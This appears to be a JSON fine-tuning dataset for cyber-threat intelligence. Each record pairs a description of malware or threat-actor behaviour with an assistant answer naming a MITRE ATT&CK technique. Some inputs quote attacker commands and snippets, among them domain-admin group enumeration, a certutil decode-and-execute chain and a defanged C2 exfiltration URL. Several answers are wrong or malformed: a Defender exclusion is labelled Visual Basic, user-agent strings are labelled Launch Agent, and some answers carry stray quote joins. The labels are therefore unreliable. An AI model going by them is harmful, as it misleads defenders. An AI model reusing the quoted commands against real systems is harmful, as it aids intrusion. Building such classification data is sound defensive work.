- "content": "During C0015, the threat actors used a malicious HTA file that contained a mix of HTML and JavaScript/VBScript code."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QUADAGENT was likely obfuscated using Invoke-Obfuscation."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used credential dumping tools."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AppleSeed has the ability to create the Registry key name \"EstsoftAutoUpdate\" at \"HKCU\\Software\\Microsoft/Windows\\CurrentVersion\\RunOnce\" to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Patchwork used Visual Basic Scripts (VBS) on victim machines."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The final payload created by the aforementioned process is a well known backdoor, also known as ROKRAT by Cisco Talos. One of its main functions is to steal information. Upon execution, this malware creates 10 random directory paths and uses them for a specially designated purpose"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LAPSUS$ has replayed stolen session token and passwords to trigger simple-approval MFA prompts in hope of the legitimate user will grant necessary approval."
- },
- {
- "role": "assistant",
- "content": "T1111 - Multi-Factor Authentication Interception"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Seedworm group controls its Powermud backdoor from behind a proxy network to hide the ultimate command-and-control (C&C) location. The Seedworm group is the only group known to use the Powermud backdoor"
- },
- {
- "role": "assistant",
- "content": "T1090.002 - External Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 11: PowerShell script is XOR encoded using a single byte key After deobfuscating the contents of the PowerShell Script, we can divide it into three sections"
- },
- {
- "role": "assistant",
- "content": "T1546.013 - Event Triggered Execution: PowerShell Profile', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The starred commands are undocumented commands"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CostaRicto employed nmap and pscan to scan target environments."
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "malware attempts to connect to Windows shares for lateral movement by using a generated list of usernames, which center around permutations of the username Administrator, and weak passwords."
- },
- {
- "role": "assistant",
- "content": "T1110 - Brute Force"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Avenger has the ability to use HTTP in communication with C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can be used to schedule a task on a system."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 used WMI to steal credentials and execute backdoors at a future time. They have also used WMI for the remote execution of files for lateral movement."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To start, the implant looks for the AHNLAB V3 Antivirus software's class name \"49B46336-BA4D-4905-9824-D282F05F6576\". If the software is found, the implant will hide the AV software window from the view of the infected user"
- },
- {
- "role": "assistant",
- "content": "T1564.003 - Hide Artifacts: Hidden Window', 'T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SpicyOmelette has been signed with valid digital certificates."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HOPLIGHT has been observed loading several APIs associated with Pass the Hash."
- },
- {
- "role": "assistant",
- "content": "T1550.002 - Use Alternate Authentication Material: Pass the Hash"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POWERSTATS has detected security tools."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT41 exploited CVE-2020-10189 against Zoho ManageEngine Desktop Central, and CVE-2019-19781 to compromise Citrix Application Delivery Controllers (ADC) and gateway devices."
- },
- {
- "role": "assistant",
- "content": "T1190 - Exploit Public-Facing Application"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "They renamed their files to make them look like legitimate files, for example, trilog.exe, named after a legitimate Schneider Electric application"
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KOCTOPUS has used \"-WindowsStyle Hidden\" to hide the command window."
- },
- {
- "role": "assistant",
- "content": "T1564.003 - Hide Artifacts: Hidden Window"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Leafminer used several tools for retrieving login and password information, including LaZagne."
- },
- {
- "role": "assistant",
- "content": "T1003.004 - OS Credential Dumping: LSA Secrets', 'T1003.005 - OS Credential Dumping: Cached Domain Credentials', 'T1552.001 - Unsecured Credentials: Credentials In Files', 'T1555 - Credentials from Password Stores', 'T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Starting with a simple scan, the first information that the malware can collect is related to files with the following extensions: .docx, .xlsx, .pdf, .pptx, .rar, .zip, .jpg, .bmp, .tiff. For each file found on the disk, it retrieves the full path and the last modified date of the file. That information is encrypted using the AES key mentioned earlier and stored in the file 0.txt. Another scan targets the extensions .dat, .json, .db and like the previous scan it retrieves the full path and last modified date of the file. Then it encrypts them and it stores it under the file 57.txt"
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In its new attack, the actor initiated the infection chain sending a spear-phishing email containing a macro-embedded Word document."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SombRAT has encrypted its C2 communications with AES."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The two main changes are the obfuscation and the network protocol to communicate to the C2 server. The developers used two different obfuscation algorithms: one for the C2 encoding and one for the data. The C2 encoding is a simple XOR (as in 2012): The C2 encoding communication is also different. As the data are now sent with the GET method, the data must be in ASCII. That's they add base64 encoding in order to get supported characters in the HTTP query. For the first time, the developer switched from POST requests to GET requests: The exfiltrated data is appended to the URL. Here is the pattern: hxxp://C2_domain/MalwareIDVictimIPThirdIDExfiltratedDataBase64 SHA256:37d1bd82527d50df3246f12b931c69c2b9e978b593a64e89d16bfe0eb54645b0 C2 URL:hxxp://www[.]amanser951[.]otzo[.]com/uiho0.0.0.0edrftg.txt"
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly has cleared Windows event logs and other logs produced by tools they used, including system, security, terminal services, remote services, and audit logs. The actors also deleted specific Registry keys."
- },
- {
- "role": "assistant",
- "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ifconfig can be used to display adapter configuration on Unix systems, including information for TCP/IP, DNS, and DHCP."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QakBot has collected usernames and passwords from Firefox and Chrome."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As we can see, the flow is obfuscated. But in Pony this technique is used in more sophisticated way because there are some junk instructions added between the PUSH and the RET in addition to a never executed bogus conditional jump"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RemoteCMD: This tool executes commands on remote computers, similar to the PsExec tool"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Clop can encrypt files using AES, RSA, and RC4 and will add the \".clop\" extension to encrypted files."
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bundlore uses the \"mktemp\" utility to make unique file and directory names for payloads, such as \"TMP_DIR=`mktemp -d -t x\"."
- },
- {
- "role": "assistant",
- "content": "T1564 - Hide Artifacts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses public sites such as github.com and sendspace.com to upload files and then download them to victim computers."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cachedump can extract cached password hashes from cache entry information."
- },
- {
- "role": "assistant",
- "content": "T1003.005 - OS Credential Dumping: Cached Domain Credentials"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mivast has the capability to gather NTLM password information."
- },
- {
- "role": "assistant",
- "content": "T1003.002 - OS Credential Dumping: Security Account Manager"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EXOTIC LILY has gathered targeted individuals' e-mail addresses through open source research and website contact forms."
- },
- {
- "role": "assistant",
- "content": "T1589.002 - Email Addresses"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used RDP connections to move across the victim network."
- },
- {
- "role": "assistant",
- "content": "T1021.001 - Remote Services: Remote Desktop Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cyclops Blink has the ability to use the Linux API function `utime` to change the timestamps of modified firmware update images."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rising Sun used dynamic API resolutions to various Windows APIs by leveraging `LoadLibrary()` and `GetProcAddress()`."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RTM has the ability to remove Registry entries that it created during execution."
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can download files from its C2 server to the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Internal Reconnaissance APT40 uses compromised credentials to log on to other connected systems and conduct reconnaissance"
- },
- {
- "role": "assistant",
- "content": "T1021 - Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The script modifies Windows Defender settings to exclude the target logical drive it is going to wipe from scheduled and real-time scanning"
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Leviathan has used BITSAdmin to download additional tools."
- },
- {
- "role": "assistant",
- "content": "T1197 - BITS Jobs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The macro prepends the string -----BEGIN CERTIFICATE----- to the beginning of the base64 encoded payload and appends -----END CERTIFICATE----- to the end of the data. The macro then writes this data to a text file in the C:\\Programdata folder using a random filename with the .txt extension. The macro then uses the command certutil -decode to decode the contents of this text file and outputs the decoded content to a randomly named file with a .exe extension in the C:\\Programdata folder. The macro sleeps for two seconds and then executes the newly dropped executable. Open-source Delivery Document Generator It appears that Sofacy may have used an open-source tool called Luckystrike to generate the delivery document and/or the macro used in this attack. Luckystrike, which was presented at DerbyCon 6 in September 2016, is a Microsoft PowerShell-based tool that generates malicious delivery documents by allowing a user to add a macro to an Excel or Word document to execute an embedded payload. We believe Sofacy used this tool, as the macro within their delivery document closely resembles the macros found within Luckystrike. To confirm our suspicions, we generated a malicious Excel file with Luckystrike and compared its macro to the macro found within Sofacy's delivery document. We found that there was only one difference between the macros besides the random function name and random cell values that the Luckystrike tool generates for each created payload"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Examining the use of the unique user agents’ strings over time shows that while previously only the Mozilla/5.0 user agent was in use, since mid 2017 all three user agent strings have been used by the Zebrocy tool for its C2 communications"
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery', 'T1543.001 - Create or Modify System Process: Launch Agent"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Anchor has used ICMP in C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BlackTech has used spearphishing e-mails with links to cloud services to deliver malware."
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "malware gathers passwords from multiple sources, including Windows Credential Vault, Internet Explorer, Firefox, Chrome, and Outlook."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Leviathan has targeted RDP credentials and used it to move through the victim environment."
- },
- {
- "role": "assistant",
- "content": "T1021.001 - Remote Services: Remote Desktop Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has encrypted C2 traffic with RC4, previously using keys of 88888888 and babybear."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DarkVishnya used network sniffing to obtain login data."
- },
- {
- "role": "assistant",
- "content": "T1040 - Network Sniffing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Vulnerabilities such as ProxyShell (CVE-2021-34473) and improper SQL sanitization (CVE-2021-20028) have been observed being utilized as footholds into the environment."
- },
- {
- "role": "assistant",
- "content": "T1588.006 - Vulnerabilities', 'T1190 - Exploit Public-Facing Application"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The following code example shows the false flag being set (5 > 115) and the ETransaksi.diomadnfagaghagh method being called: int num = 5; int num2 = 155; bool flag = num > num2; if (flag) { } else { NewLateBinding.LateCall(ETransaksi.diomadnfagaghagh(), null, \"Invoke\", new object[] { null, new object[0] }, null, null, null, true);The payload uses this technique to run a chain of methods that eventually carry out its malicious task"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ajax Security Team has used FireMalv custom-developed malware, which collected passwords from the Firefox browser storage."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ember Bear has added extra spaces between JavaScript code characters to increase the overall file size."
- },
- {
- "role": "assistant",
- "content": "T1027.001 - Obfuscated Files or Information: Binary Padding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Delivery TG-3390 conducts SWCs or sends spearphishing emails with ZIP archive attachments"
- },
- {
- "role": "assistant",
- "content": "T1598.002 - Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cardinal RAT decodes many of its artifacts and is decrypted (AES-128) after being downloaded."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MarkiRAT can search for different processes on a system."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SysUpdate has the ability to download files to a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MacMa can collect information about a compromised computer, including: Hardware UUID, Mac serial number, macOS version, and disk sizes."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Ritsol backdoor trojan used by can download files onto a compromised host from a remote location."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "contains a collection of Privesc-PowerUp modules that can query Registry keys for potential opportunities."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "compromised user credentials and used valid accounts for operations."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has checked for the local admin group domain admin group and Exchange Trusted Subsystem groups using the commands net group Exchange Trusted Subsystem /domain and net group domain admins /domain."
- },
- {
- "role": "assistant",
- "content": "T1069 - Permission Groups Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mimikatz performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from DCSync/NetSync."
- },
- {
- "role": "assistant",
- "content": "T1003.006 - OS Credential Dumping: DCSync"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 registered domains imitating NATO, OSCE security websites, Caucasus information resources, and other organizations."
- },
- {
- "role": "assistant",
- "content": "T1583.001 - Domains"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "XTunnel is capable of downloading additional files."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "monitors USB devices and copies files with certain extensions to\na predefined directory."
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A build tool is likely being used by these attackers that allows the operator to configure details such as C2 addresses, C2 encryption keys, and a campaign code"
- },
- {
- "role": "assistant",
